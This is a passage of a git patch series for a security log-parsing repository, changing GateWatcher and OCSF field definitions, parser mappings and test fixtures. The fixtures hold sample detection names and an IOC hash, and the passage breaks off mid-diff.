zi|L?Q^H^B@wNV@RkUk}9dSJ)$t9}8x{YkB5!2TvKlwB<$ZKgZ`_)CuCWWGXDc4(&2
zuxAw&H>9!jsS7B4t_j&T5-GFoAQ_TJz=M{p{UR)({Uo}gb4*u8P_wW==F7%bB@b1x
zNG{Vg=_W#9EfIgrwU59L%4*C=nz4LdTF<^=!V5$6)-?~FC(^{R=_?_$fq#%uvxr6I
zx8<LY0<AAR3apbm&XW>ULFmcjqZd)dvcXmYPM;RU(e3R11nr(6*~Pc$u%B5Jax^L4
ziC><K{Q{m(VsE-)_jhsy@#s%1Dd#z%<rQ`^%CaO{Sm~+bl06!_6}B1~&GsIKYw)Ue
zsf!30fPGet_VKutWE4oasAm4`%hFO-)r(*c>Ff`?m}=5B{!7)aR9e<ByB!P()H64G
zvrzqG*4UpU+piW(U0rYRbK2DjP;OdzGcP_NC?Hkiq7sGJgbCr!ht%T=xA|SqqSC}X
zw$zy>1o3#pC?erYnp%aCSDu9uDGd3_(XIZ>oD-cpZ|(HwKid^7NW^Q2VkaB-CQosI
z{I*mwGcf5A?L91DdkkZrGg0=bQG1IJ0jw>R%qnx&zPVh_7Cy><!gS{ScUE%%`?IJi
zozxdc5Ct~)7v(|Ik+C8qwP{u-FY83N<4PwP)pscfA;kyE%?VMI<neG5xsJWaeqgo8
z&I9SiSq95fX?cn+Z|w>i$NNMu&ggz+=yTzjtjGOX#-;wyM~>pS)d`gCClrdtqU#qB
zr2yG;Mqs`t==?WAmXFO78Srw|``k|0#Irk#P^SycqN^tvBn;{e(->P;`31J{<HiQK
zw6V_>dbR9*i~@Y$c9qBvLF{GYu0d#ILvu29+>Vo{Q|O#2_==DIxQ%p)5mhV(B^O7t
zx?q#ZUR|rbm3U6dsy49Nss^4ne_=VFb<;6N$lIOp>sWiM%>1>X<Cj#}ogvE3?3N}6
zDH`eGf+W~%s#K1sJlAhH=<}*O?`)T1-IacpV|C-htWrV~MK#8YXjz??1v0@+1a2ze
zU|R5Pi=?hsa|bDn&bN5~2=XXlCdync!X|}|>Dy<}u3Mb>mLV)t<m2mKl*lcr*B|Gz
z1)bg0A>NegGOo+sgS04EO%@YBFi0eFTF})uQ5{+@xcx<!Cc$r64dS!pb2Y$IakL}J
z{$+(;i0Ql(ktiB6A=#Ldz1l!-6~~-GZQdL4eJB9Q0U$ihR`Q~UDgOmjFwxJ)Boqf!
zSZSRsQ;2suP5JEl<5Bv2$?Sy~L8&(9@0fiaF4Ar_$0Y7YmCg+c(Tcqf1lIf}cwauZ
z7@e0WIug?I_e*43QbwVN^J=Z1_;ikp2~k4M)1TfmBL_5jJ)(p??Fy_{PA|CF3``uQ
zt_BV7<=RUIQp?MT3&jy=c$vQ}SH-@j_EI<Zw#JAy@-PP2Q#QogU=1AZECudpVB|a0
z^qu5KU@D4q;ms`iw>Co8-Q8W=3lxqlV-WDf6(EiR%#vZ&qvKXUO2l@-E>z^+xcyzq
zu<jx`vyRp(%enVXn3F5r+jrOb&e9p?tm#ql5_*I5B)ENT>;$hVUcF_wEa)!6bWDwN
zx{*X92?&E*1ETpe;xcJ(Wo3Nbnn6S{6#+8R4$lJ73;RHUPzD7>2q*E_G-QH!EK`a$
z#+GGF?E*n9Gkp#{+E21#eej>c5A+0l9hGl%DXSMQUO}t-nivQGL`;K7`z!<y2@ADh
z*s|}?HilLB#Ziv6*V=qu1^%dJ(AVC*cu_xQ=W7f=2s6Xpttv;(OYz-p-1*1-rTh1;
z0yJsGLG~+4ie4a!YbFCS7?TP^n+K&sE|jD~`mV2%Q;L);dcTR6DyyODSWQ;d)wsWp
z$i6Q9Lm6eMD+2w|$0U)32G1ppo+5oG2fXfB*e&_q?U9d-ZCKLthY67&X!RqNsIFK0
zH_L*c;m)pNp$-@IeNU@EWgCxg2&k}bG=g<O=4LC2;fB-vv+QWAI$I9=*NTVAh@+#j
zy}>=;@g&V(?}y(Nn!|-+Vu4TCD+Q}RJx`xTN49VF#EbflNmE4>vQDt=c}|q=j;HHa
gYRXXaw(c-_-TyS;4D1ZT|Coy)FQXz|D`^(`KbLQIApigX

diff --git a/1Password/_meta/manifest.yml b/1Password/_meta/manifest.yml
index 7a2995595..9c3fde957 100644
--- a/1Password/_meta/manifest.yml
+++ b/1Password/_meta/manifest.yml
@@ -1,5 +1,5 @@
 uuid: c938db6f-be6c-425c-8ea2-eab1ff63bc83
 name: 1Password
-slug: "1password"
+slug: one-password
 description: >-
   1Password is a password management company that provides secure solutions for storing and managing passwords and sensitive information. Its services are designed for both individuals and teams to ensure online security and simplify credential management.

From 54ff2173c325461cdcc2be6e4ef9a8e0b68b6ad7 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Tue, 17 Sep 2024 14:14:29 +0200
Subject: [PATCH 042/317] fix gatewatcher.malcore.code to a number type

---
 GateWatcher/aioniq/_meta/fields.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml
index 60ddda7ad..d1263225c 100644
--- a/GateWatcher/aioniq/_meta/fields.yml
+++ b/GateWatcher/aioniq/_meta/fields.yml
@@ -21,7 +21,7 @@ gatewatcher.gcenter:
 gatewatcher.malcore.code:
   description: Return code of the malcore analysis
   name: gatewatcher.malcore.code
-  type: keyword
+  type: number
 
 gatewatcher.malcore.detail_threat_found:
   description: Type of the detected threat

From 7e5ae69dfde2978b9ac465f07b32034e05ae89b5 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Tue, 17 Sep 2024 14:25:21 +0200
Subject: [PATCH 043/317] fix for gatewatcher.tftp.* fields to comfort
 structured ones as well as ECS format

---
 GateWatcher/aioniq/_meta/fields.yml  | 17 +++++++++++++----
 GateWatcher/aioniq/ingest/parser.yml |  4 +++-
 2 files changed, 16 insertions(+), 5 deletions(-)

diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml
index d1263225c..5bdc4fb3e 100644
--- a/GateWatcher/aioniq/_meta/fields.yml
+++ b/GateWatcher/aioniq/_meta/fields.yml
@@ -373,10 +373,19 @@ gatewatcher.targeted_sectors:
   name: gatewatcher.targeted_sectors
   type: text
 
-gatewatcher.tftp:
-  description: This field represents the tftp field in a network metadata (used in
-    legacy format log)
-  name: gatewatcher.tftp
+gatewatcher.tftp.file:
+  description: tftp file field
+  name: gatewatcher.tftp.file
+  type: text
+
+gatewatcher.tftp.mode:
+  description: tftp mode field
+  name: gatewatcher.tftp.mode
+  type: text
+
+gatewatcher.tftp.packet:
+  description: tftp packet field
+  name: gatewatcher.tftp.packet
   type: text
 
 gatewatcher.threat_actor:
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 7679c02a1..162cc5093 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -156,7 +156,9 @@ stages:
           gatewatcher.mqtt: '{{json_load.message.mqtt}}'
           gatewatcher.smtp: '{{json_load.message.smtp}}'
           gatewatcher.snmp: '{{json_load.message.snmp}}'
-          gatewatcher.tftp: '{{json_load.message.tftp}}'
+          gatewatcher.tftp.file: '{{json_load.message.tftp.file}}'
+          gatewatcher.tftp.mode: '{{json_load.message.tftp.mode}}'
+          gatewatcher.tftp.packet: '{{json_load.message.tftp.packet}}'
           destination.bytes: '{{json_load.message.flow.bytes_toclient}}'
           dns.question.name: '{{json_load.message.dns.rrname}}'
           dns.question.type: '{{json_load.message.dns.rrtype}}'

From b3c2ef63bae75547ff1841ac93349ef38c54ddf1 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Tue, 17 Sep 2024 14:40:20 +0200
Subject: [PATCH 044/317] fix for gatewatcher.email.to & from, removed from
 fields

---
 GateWatcher/aioniq_ecs/_meta/fields.yml  | 10 ----------
 GateWatcher/aioniq_ecs/ingest/parser.yml |  4 ++--
 2 files changed, 2 insertions(+), 12 deletions(-)

diff --git a/GateWatcher/aioniq_ecs/_meta/fields.yml b/GateWatcher/aioniq_ecs/_meta/fields.yml
index 733dd5550..4c47ec94e 100644
--- a/GateWatcher/aioniq_ecs/_meta/fields.yml
+++ b/GateWatcher/aioniq_ecs/_meta/fields.yml
@@ -203,11 +203,6 @@ gatewatcher.email.body_md5:
   name: gatewatcher.email.body_md5
   type: text
 
-gatewatcher.email.from:
-  description: email from field
-  name: gatewatcher.email.from
-  type: text
-
 gatewatcher.email.status:
   description: email status field
   name: gatewatcher.email.status
@@ -218,11 +213,6 @@ gatewatcher.email.subject_md5:
   name: gatewatcher.email.subject_md5
   type: text
 
-gatewatcher.email.to:
-  description: email to field
-  name: gatewatcher.email.to
-  type: text
-
 gatewatcher.event.created:
   description: Event created field
   name: gatewatcher.event.created
diff --git a/GateWatcher/aioniq_ecs/ingest/parser.yml b/GateWatcher/aioniq_ecs/ingest/parser.yml
index 8f53ec153..3fd4eea43 100644
--- a/GateWatcher/aioniq_ecs/ingest/parser.yml
+++ b/GateWatcher/aioniq_ecs/ingest/parser.yml
@@ -376,8 +376,8 @@ stages:
           email.subject: '{{json_load.message.email.subject}}'
           email.message_id: '{{json_load.message.email.message_id}}'
           email.attachments: '{{json_load.message.email.attachments}}'
-          gatewatcher.email.to: '{{json_load.message.email.to}}'
-          gatewatcher.email.from: '{{json_load.message.email.from}}'
+          email.to.address: '{{json_load.message.email.to}}'
+          email.from.address: '{{json_load.message.email.from}}'
           gatewatcher.email.status: '{{json_load.message.email.status}}'
           gatewatcher.email.body_md5: '{{json_load.message.email.body_md5}}'
           gatewatcher.email.subject_md5: '{{json_load.message.email.subject_md5}}'

From 12624b8f6e31739dd5f7e631b5d602e4cf81199d Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Tue, 17 Sep 2024 14:48:08 +0200
Subject: [PATCH 045/317] suggested changes applied for syslog fields

---
 GateWatcher/aioniq_ecs/_meta/fields.yml  | 20 ++++++++++++++++++++
 GateWatcher/aioniq_ecs/ingest/parser.yml | 12 ++++++------
 2 files changed, 26 insertions(+), 6 deletions(-)

diff --git a/GateWatcher/aioniq_ecs/_meta/fields.yml b/GateWatcher/aioniq_ecs/_meta/fields.yml
index 4c47ec94e..7e7dc42d8 100644
--- a/GateWatcher/aioniq_ecs/_meta/fields.yml
+++ b/GateWatcher/aioniq_ecs/_meta/fields.yml
@@ -1243,6 +1243,26 @@ gatewatcher.syslog.message:
   name: gatewatcher.syslog.message
   type: text
 
+gatewatcher.syslog.priority:
+  description: syslog priority field
+  name: gatewatcher.syslog.priority
+  type: text
+
+gatewatcher.syslog.facility.code:
+  description: syslog facility code field
+  name: gatewatcher.syslog.facility.code
+  type: text
+
+gatewatcher.syslog.facility.name:
+  description: syslog facility name field
+  name: gatewatcher.syslog.facility.name
+  type: text
+
+gatewatcher.syslog.severity.name:
+  description: syslog severity name field
+  name: gatewatcher.syslog.severity.name
+  type: text
+
 gatewatcher.tftp.file:
   description: tftp file field
   name: gatewatcher.tftp.file
diff --git a/GateWatcher/aioniq_ecs/ingest/parser.yml b/GateWatcher/aioniq_ecs/ingest/parser.yml
index 3fd4eea43..96c44306c 100644
--- a/GateWatcher/aioniq_ecs/ingest/parser.yml
+++ b/GateWatcher/aioniq_ecs/ingest/parser.yml
@@ -650,12 +650,12 @@ stages:
   syslog:
     actions:
       - set:
-          log.syslog.appname: '{{json_load.message.log.syslog.appname}}'
-          log.syslog.priority: '{{json_load.message.log.syslog.priority}}'
-          log.syslog.facility.code: '{{json_load.message.log.syslog.facility.code}}'
-          log.syslog.facility.name: '{{json_load.message.log.syslog.facility.name}}'
-          log.syslog.severity.code: '{{json_load.message.log.syslog.severity.code}}'
-          log.syslog.severity.name: '{{json_load.message.log.syslog.severity.name}}'
+          network.application: '{{json_load.message.log.syslog.appname}}'
+          gatewatcher.syslog.priority: '{{json_load.message.log.syslog.priority}}'
+          gatewatcher.syslog.facility.code: '{{json_load.message.log.syslog.facility.code}}'
+          gatewatcher.syslog.facility.name: '{{json_load.message.log.syslog.facility.name}}'
+          event.severity: '{{json_load.message.log.syslog.severity.code}}'
+          gatewatcher.syslog.severity.name: '{{json_load.message.log.syslog.severity.name}}'
           gatewatcher.syslog.message: '{{json_load.message.syslog.message}}'
         filter: ''
         name: set

From fd166f6ff6093d640c84b156384bb07f7c5eee96 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Tue, 17 Sep 2024 14:54:46 +0200
Subject: [PATCH 046/317] suggested changes applied for gatewatcher.ioc.* field

---
 GateWatcher/aioniq_ecs/_meta/fields.yml  | 15 ---------------
 GateWatcher/aioniq_ecs/ingest/parser.yml |  6 +++---
 2 files changed, 3 insertions(+), 18 deletions(-)

diff --git a/GateWatcher/aioniq_ecs/_meta/fields.yml b/GateWatcher/aioniq_ecs/_meta/fields.yml
index 7e7dc42d8..a036865f3 100644
--- a/GateWatcher/aioniq_ecs/_meta/fields.yml
+++ b/GateWatcher/aioniq_ecs/_meta/fields.yml
@@ -533,16 +533,6 @@ gatewatcher.ioc.threat_actor:
   name: gatewatcher.ioc.threat_actor
   type: text
 
-gatewatcher.ioc.tlp:
-  description: ioc tlp field
-  name: gatewatcher.ioc.tlp
-  type: text
-
-gatewatcher.ioc.type:
-  description: ioc type field
-  name: gatewatcher.ioc.type
-  type: text
-
 gatewatcher.ioc.updated_date:
   description: ioc updated_date field
   name: gatewatcher.ioc.updated_date
@@ -553,11 +543,6 @@ gatewatcher.ioc.usage_mode:
   name: gatewatcher.ioc.usage_mode
   type: text
 
-gatewatcher.ioc.value:
-  description: ioc value field
-  name: gatewatcher.ioc.value
-  type: text
-
 gatewatcher.krb5.cname:
   description: krb5 cname field
   name: gatewatcher.krb5.cname
diff --git a/GateWatcher/aioniq_ecs/ingest/parser.yml b/GateWatcher/aioniq_ecs/ingest/parser.yml
index 96c44306c..42afcb85b 100644
--- a/GateWatcher/aioniq_ecs/ingest/parser.yml
+++ b/GateWatcher/aioniq_ecs/ingest/parser.yml
@@ -738,10 +738,10 @@ stages:
   ioc:
     actions:
       - set:
-          gatewatcher.ioc.tlp: '{{json_load.message.ioc.tlp}}'
+          threat.indicator.marking.tlp: '{{json_load.message.ioc.tlp}}'
           gatewatcher.ioc.tags: '{{json_load.message.ioc.tags}}'
-          gatewatcher.ioc.type: '{{json_load.message.ioc.type}}'
-          gatewatcher.ioc.value: '{{json_load.message.ioc.value}}'
+          threat.indicator.type: '{{json_load.message.ioc.type}}'
+          threat.indicator.name: '{{json_load.message.ioc.value}}'
           gatewatcher.ioc.case_id: '{{json_load.message.ioc.case_id}}'
           gatewatcher.ioc.families: '{{json_load.message.ioc.families}}'
           gatewatcher.ioc.campaigns: '{{json_load.message.ioc.campaigns}}'

From 6565542fe622c3172c2d2b7b3a8543da26b53c09 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Tue, 17 Sep 2024 16:20:26 +0200
Subject: [PATCH 047/317] updated tests

---
 GateWatcher/aioniq/tests/malcore.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json
index 9c3c5ea11..996eea0b8 100644
--- a/GateWatcher/aioniq/tests/malcore.json
+++ b/GateWatcher/aioniq/tests/malcore.json
@@ -42,7 +42,7 @@
       "gcap": "gcap-xxxxxxxx.domain.local",
       "gcenter": "gcenter-xxxxxxxx.domain.local",
       "malcore": {
-        "code": "1",
+        "code": 1,
         "detail_threat_found": "Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF"
       },
       "reporting_token": "No GBOX",

From f0cc4fdb754960357f2baa82f0f493908fd43e7d Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Tue, 17 Sep 2024 16:23:38 +0200
Subject: [PATCH 048/317] updated tests

---
 GateWatcher/aioniq_ecs/tests/ioc.json | 14 ++++++++++----
 1 file changed, 10 insertions(+), 4 deletions(-)

diff --git a/GateWatcher/aioniq_ecs/tests/ioc.json b/GateWatcher/aioniq_ecs/tests/ioc.json
index 190c98114..ffb6a02cd 100644
--- a/GateWatcher/aioniq_ecs/tests/ioc.json
+++ b/GateWatcher/aioniq_ecs/tests/ioc.json
@@ -78,11 +78,8 @@
         "threat_actor": [
           "BlackTech"
         ],
-        "tlp": "green",
-        "type": "SHA256",
         "updated_date": "2023-04-07T04:10:34Z",
-        "usage_mode": "detection",
-        "value": "2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4"
+        "usage_mode": "detection"
       },
       "observer": {
         "log_format_version": "1.0.0"
@@ -91,6 +88,15 @@
     "observer": {
       "product": "lastinfosec",
       "vendor": "gatewatcher"
+    },
+    "threat": {
+      "indicator": {
+        "marking": {
+          "tlp": "green"
+        },
+        "name": "2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4",
+        "type": "SHA256"
+      }
     }
   }
 }
\ No newline at end of file

From ad7b91e63c538d987ed3c9dc6ed36269241d7e4e Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 17 Sep 2024 18:32:36 +0200
Subject: [PATCH 049/317] fix(OCSF): prefix process users

---
 OCSF/ocsf/_meta/fields.yml  | 24 ++++++++++++------------
 OCSF/ocsf/ingest/parser.yml | 24 ++++++++++++------------
 2 files changed, 24 insertions(+), 24 deletions(-)

diff --git a/OCSF/ocsf/_meta/fields.yml b/OCSF/ocsf/_meta/fields.yml
index 153d909a6..be3385077 100644
--- a/OCSF/ocsf/_meta/fields.yml
+++ b/OCSF/ocsf/_meta/fields.yml
@@ -40,19 +40,19 @@ process.group.name:
   name: process.group.name
   type: keyword
 
-process.parent.user.domain:
+ocsf.process.parent.user.domain:
   description: ''
-  name: process.parent.user.domain
+  name: ocsf.process.parent.user.domain
   type: keyword
 
-process.parent.user.email:
+ocsf.process.parent.user.email:
   description: ''
-  name: process.parent.user.email
+  name: ocsf.process.parent.user.email
   type: keyword
 
-process.parent.user.full_name:
+ocsf.process.parent.user.full_name:
   description: ''
-  name: process.parent.user.full_name
+  name: ocsf.process.parent.user.full_name
   type: keyword
 
 process.parent.user.group.id:
@@ -65,19 +65,19 @@ process.parent.user.group.name:
   name: process.parent.user.group.name
   type: keyword
 
-process.user.domain:
+ocsf.process.user.domain:
   description: ''
-  name: process.user.domain
+  name: ocsf.process.user.domain
   type: keyword
 
-process.user.email:
+ocsf.process.user.email:
   description: ''
-  name: process.user.email
+  name: ocsf.process.user.email
   type: keyword
 
-process.user.full_name:
+ocsf.process.user.full_name:
   description: ''
-  name: process.user.full_name
+  name: ocsf.process.user.full_name
   type: keyword
 
 process.user.group.id:
diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index 0c57d8113..8670753fd 100644
--- a/OCSF/ocsf/ingest/parser.yml
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -321,9 +321,9 @@ stages:
           process.start: "{{ parse_event.message.actor.process.created_time | to_rfc3339 }}"
           process.thread.id: "{{ parse_event.message.actor.process.tid }}"
           process.entity_id: "{{ parse_event.message.actor.process.uid }}"
-          process.user.domain: "{{ parse_event.message.actor.process.user.domain }}"
-          process.user.email: "{{ parse_event.message.actor.process.user.email_addr }}"
-          process.user.full_name: "{{ parse_event.message.actor.process.user.full_name }}"
+          ocsf.process.user.domain: "{{ parse_event.message.actor.process.user.domain }}"
+          ocsf.process.user.email: "{{ parse_event.message.actor.process.user.email_addr }}"
+          ocsf.process.user.full_name: "{{ parse_event.message.actor.process.user.full_name }}"
       - set:
           process.user.id:
             - "{{ parse_event.message.actor.process.euid }}"
@@ -380,9 +380,9 @@ stages:
           process.parent.start: "{{ parse_event.message.actor.process.parent_process.created_time | to_rfc3339 }}"
           process.parent.thread.id: "{{ parse_event.message.actor.process.parent_process.tid }}"
           process.parent.entity_id: "{{ parse_event.message.actor.process.parent_process.uid }}"
-          process.parent.user.domain: "{{ parse_event.message.actor.process.parent_process.user.domain }}"
-          process.parent.user.email: "{{ parse_event.message.actor.process.parent_process.user.email_addr }}"
-          process.parent.user.full_name: "{{ parse_event.message.actor.process.parent_process.user.full_name }}"
+          ocsf.process.parent.user.domain: "{{ parse_event.message.actor.process.parent_process.user.domain }}"
+          ocsf.process.parent.user.email: "{{ parse_event.message.actor.process.parent_process.user.email_addr }}"
+          ocsf.process.parent.user.full_name: "{{ parse_event.message.actor.process.parent_process.user.full_name }}"
       - set:
           process.parent.user.id:
             - "{{ parse_event.message.actor.process.parent_process.euid }}"
@@ -616,9 +616,9 @@ stages:
           process.start: "{{ parse_event.message.process.created_time | to_rfc3339 }}"
           process.thread.id: "{{ parse_event.message.process.tid }}"
           process.entity_id: "{{ parse_event.message.process.uid }}"
-          process.user.domain: "{{ parse_event.message.process.user.domain }}"
-          process.user.email: "{{ parse_event.message.process.user.email_addr }}"
-          process.user.full_name: "{{ parse_event.message.process.user.full_name }}"
+          ocsf.process.user.domain: "{{ parse_event.message.process.user.domain }}"
+          ocsf.process.user.email: "{{ parse_event.message.process.user.email_addr }}"
+          ocsf.process.user.full_name: "{{ parse_event.message.process.user.full_name }}"
       - set:
           process.user.id:
             - "{{ parse_event.message.process.euid }}"
@@ -652,9 +652,9 @@ stages:
           process.parent.start: "{{ parse_event.message.process.parent_process.created_time | to_rfc3339 }}"
           process.parent.thread.id: "{{ parse_event.message.process.parent_process.tid }}"
           process.parent.entity_id: "{{ parse_event.message.process.parent_process.uid }}"
-          process.parent.user.domain: "{{ parse_event.message.process.parent_process.user.domain }}"
-          process.parent.user.email: "{{ parse_event.message.process.parent_process.user.email_addr }}"
-          process.parent.user.full_name: "{{ parse_event.message.process.parent_process.user.full_name }}"
+          ocsf.process.parent.user.domain: "{{ parse_event.message.process.parent_process.user.domain }}"
+          ocsf.process.parent.user.email: "{{ parse_event.message.process.parent_process.user.email_addr }}"
+          ocsf.process.parent.user.full_name: "{{ parse_event.message.process.parent_process.user.full_name }}"
       - set:
           process.parent.user.id:
             - "{{ parse_event.message.process.parent_process.euid }}"

From 90e897ac7589045920c1482ef6fcd87d2b5abf0d Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 17 Sep 2024 18:35:38 +0200
Subject: [PATCH 050/317] refactor(OCSF): change the way to represent the group
 associated to process

---
 OCSF/ocsf/_meta/fields.yml                   |  34 ++----
 OCSF/ocsf/ingest/parser.yml                  | 121 +++++++++++++------
 OCSF/ocsf/tests/test_process_activity_1.json |   4 -
 3 files changed, 93 insertions(+), 66 deletions(-)

diff --git a/OCSF/ocsf/_meta/fields.yml b/OCSF/ocsf/_meta/fields.yml
index be3385077..532291fd9 100644
--- a/OCSF/ocsf/_meta/fields.yml
+++ b/OCSF/ocsf/_meta/fields.yml
@@ -30,15 +30,15 @@ ocsf.vulnerabilities:
   name: ocsf.vulnerabilities
   type: array
 
-process.group.id:
+ocsf.process.group:
   description: ''
-  name: process.group.id
-  type: keyword
+  name: ocsf.process.group
+  type: dict
 
-process.group.name:
+ocsf.process.parent.group:
   description: ''
-  name: process.group.name
-  type: keyword
+  name: ocsf.process.parent.group
+  type: dict
 
 ocsf.process.parent.user.domain:
   description: ''
@@ -55,15 +55,10 @@ ocsf.process.parent.user.full_name:
   name: ocsf.process.parent.user.full_name
   type: keyword
 
-process.parent.user.group.id:
-  description: ''
-  name: process.parent.user.group.id
-  type: keyword
-
-process.parent.user.group.name:
+ocsf.process.parent.user.groups:
   description: ''
-  name: process.parent.user.group.name
-  type: keyword
+  name: ocsf.process.parent.user.groups
+  type: array
 
 ocsf.process.user.domain:
   description: ''
@@ -80,12 +75,7 @@ ocsf.process.user.full_name:
   name: ocsf.process.user.full_name
   type: keyword
 
-process.user.group.id:
-  description: ''
-  name: process.user.group.id
-  type: keyword
-
-process.user.group.name:
+ocsf.process.user.groups:
   description: ''
-  name: process.user.group.name
-  type: keyword
+  name: ocsf.process.user.groups
+  type: array
diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index 8670753fd..7284638f6 100644
--- a/OCSF/ocsf/ingest/parser.yml
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -307,15 +307,20 @@ stages:
             {%- for item in parse_event.message.actor.process.file.hashes -%}{%- if item.algorithm == 'TLSH' -%}{{ item.value }}{%- endif -%}{%- endfor -%}
 
       - set:
-          process.group.id:
-            - "{{ parse_event.message.actor.process.egid }}"
+          ocsf.process.group: >
+            {
+              'id': '{{ parse_event.message.actor.process.egid }}',
+              'name': '{{ parse_event.message.actor.process.group.name }}'
+            }
         filter: "{{ parse_event.message.actor.process.get('egid') != None }}"
       - set:
-          process.group.id:
-            - "{{ parse_event.message.actor.process.group.uid }}"
+          ocsf.process.group: >
+            {
+              'id': '{{ parse_event.message.actor.process.group.uid }}',
+              'name': '{{ parse_event.message.actor.process.group.name }}'
+            }
         filter: "{{ parse_event.message.actor.process.group.get('uid') != None }}"
       - set:
-          process.group.name: "{{ parse_event.message.actor.process.group.name }}"
           process.name: "{{ parse_event.message.actor.process.name }}"
           process.pid: "{{ parse_event.message.actor.process.pid }}"
           process.start: "{{ parse_event.message.actor.process.created_time | to_rfc3339 }}"
@@ -333,17 +338,27 @@ stages:
             - "{{ parse_event.message.actor.process.user.uid }}"
         filter: "{{ parse_event.message.actor.process.user.get('uid') != None }}"
       - set:
-          process.user.group.id: >
-            [{%- for item in parse_event.message.actor.process.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}]
-
-          process.user.group.name: >
-            [{%- for item in parse_event.message.actor.process.user.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}]
-
-          process.parent.user.group.id: >
-            [{%- for item in parse_event.message.actor.process.parent_process.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}]
-
-          process.parent.user.group.name: >
-            [{%- for item in parse_event.message.actor.process.parent_process.user.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}]
+          ocsf.process.user.groups: >
+            [
+              {%- for item in parse_event.message.actor.process.user.groups -%}
+              {
+                {%- if item.uid -%}'uid': '{{item.uid}}',{%- endif -%}
+                {%- if item.name -%}'name': '{{item.name}}',{%- endif -%}
+              },
+              {%- endfor -%}
+            ]
+        filter: "{{parse_event.message.actor.process.user.get('groups') != None}}"
+      - set:
+          ocsf.process.parent.user.groups: >
+            [
+              {%- for item in parse_event.message.actor.process.parent_process.user.groups -%}
+              {
+                {%- if item.uid -%}'uid': '{{item.uid}}',{%- endif -%}
+                {%- if item.name -%}'name': '{{item.name}}',{%- endif -%}
+              },
+              {%- endfor -%}
+            ]
+        filter: "{{parse_event.message.actor.process.parent_process.user.get('groups') != None}}"
 
       - set:
           process.user.name: "{{ parse_event.message.actor.process.user.name }}"
@@ -366,15 +381,20 @@ stages:
             ]
         filter: "{{parse_event.message.actor.user.get('groups') != None}}"
       - set:
-          process.parent.group.id:
-            - "{{ parse_event.message.actor.process.parent_process.egid }}"
+          ocsf.process.parent.group: >
+            {
+              'id': '{{ parse_event.message.actor.process.parent_process.egid }}',
+              'name': '{{ parse_event.message.actor.process.parent_process.group.name }}'
+            }
         filter: "{{ parse_event.message.actor.process.parent_process.get('egid') != None }}"
       - set:
-          process.parent.group.id:
-            - "{{ parse_event.message.actor.process.parent_process.group.uid }}"
+          ocsf.process.parent.group: >
+            {
+              'id': '{{ parse_event.message.actor.process.parent_process.group.uid }}',
+              'name': '{{ parse_event.message.actor.process.parent_process.group.name }}'
+            }
         filter: "{{ parse_event.message.actor.process.parent_process.group.get('uid') != None }}"
       - set:
-          process.parent.group.name: "{{ parse_event.message.actor.process.parent_process.group.name }}"
           process.parent.name: "{{ parse_event.message.actor.process.parent_process.name }}"
           process.parent.pid: "{{ parse_event.message.actor.process.parent_process.pid }}"
           process.parent.start: "{{ parse_event.message.actor.process.parent_process.created_time | to_rfc3339 }}"
@@ -602,15 +622,20 @@ stages:
             {%- for item in parse_event.message.process.file.hashes -%}{%- if item.algorithm == 'TLSH' -%}{{ item.value }}{%- endif -%}{%- endfor -%}
 
       - set:
-          process.group.id:
-            - "{{ parse_event.message.process.egid }}"
+          ocsf.process.group: >
+            {
+              "id": "{{ parse_event.message.process.egid }}",
+              "name": "{{ parse_event.message.process.group.name }}"
+            }
         filter: "{{ parse_event.message.process.get('egid') != None }}"
       - set:
-          process.group.id:
-            - "{{ parse_event.message.process.group.uid }}"
+          ocsf.process.group: >
+            {
+              "id": "{{ parse_event.message.process.group.uid }}",
+              "name": "{{ parse_event.message.process.group.name }}"
+            }
         filter: "{{ parse_event.message.process.group.get('uid') != None }}"
       - set:
-          process.group.name: "{{ parse_event.message.process.group.name }}"
           process.name: "{{ parse_event.message.process.name }}"
           process.pid: "{{ parse_event.message.process.pid }}"
           process.start: "{{ parse_event.message.process.created_time | to_rfc3339 }}"
@@ -628,25 +653,35 @@ stages:
             - "{{ parse_event.message.process.user.uid }}"
         filter: "{{ parse_event.message.process.user.get('uid') != None }}"
       - set:
-          process.user.group.id: >
